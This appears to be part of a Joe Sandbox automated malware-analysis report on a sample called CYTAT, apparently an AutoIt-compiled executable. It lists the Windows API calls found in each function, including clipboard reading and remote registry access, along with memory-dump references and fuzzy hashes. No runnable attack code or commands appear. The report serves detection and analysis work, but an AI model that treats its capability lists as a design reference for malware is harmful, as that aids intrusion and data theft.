                                                • GetSysColor.USER32(0000000F), ref: 00430959
                                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                                • GetSysColor.USER32(00000011), ref: 00430979
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                                • SelectObject.GDI32(?,?), ref: 004309B4
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                                • DeleteObject.GDI32(?), ref: 00430AE9
                                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1582027408-0
                                                • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseConnectCreateRegistry
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 3217815495-966354055
                                                • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                • DestroyWindow.USER32(?), ref: 00456746
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                • String ID: ($,$tooltips_class32
                                                • API String ID: 225202481-3320066284
                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                APIs
                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                • CloseClipboard.USER32 ref: 0046DD41
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                • CloseClipboard.USER32 ref: 0046DD99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                • String ID:
                                                • API String ID: 15083398-0
                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                • String ID: @$AutoIt v3 GUI
                                                • API String ID: 867697134-3359773793
                                                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                • API String ID: 1503153545-1459072770
                                                • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$__wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                • API String ID: 790654849-32604322
                                                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                APIs
                                                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                • _fseek.LIBCMT ref: 00452B3B
                                                • __wsplitpath.LIBCMT ref: 00452B9B
                                                • _wcscpy.LIBCMT ref: 00452BB0
                                                • _wcscat.LIBCMT ref: 00452BC5
                                                • __wsplitpath.LIBCMT ref: 00452BEF
                                                • _wcscat.LIBCMT ref: 00452C07
                                                • _wcscat.LIBCMT ref: 00452C1C
                                                • __fread_nolock.LIBCMT ref: 00452C53
                                                • __fread_nolock.LIBCMT ref: 00452C64
                                                • __fread_nolock.LIBCMT ref: 00452C83
                                                • __fread_nolock.LIBCMT ref: 00452C94
                                                • __fread_nolock.LIBCMT ref: 00452CB5
                                                • __fread_nolock.LIBCMT ref: 00452CC6
                                                • __fread_nolock.LIBCMT ref: 00452CD7
                                                • __fread_nolock.LIBCMT ref: 00452CE8
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                • __fread_nolock.LIBCMT ref: 00452D78
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                • String ID:
                                                • API String ID: 2054058615-0
                                                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window
                                                • String ID: 0
                                                • API String ID: 2353593579-4108050209
                                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                APIs
                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                • String ID:
                                                • API String ID: 1744303182-0
                                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                • __mtterm.LIBCMT ref: 00417C34
                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                • API String ID: 4163708885-3819984048
                                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
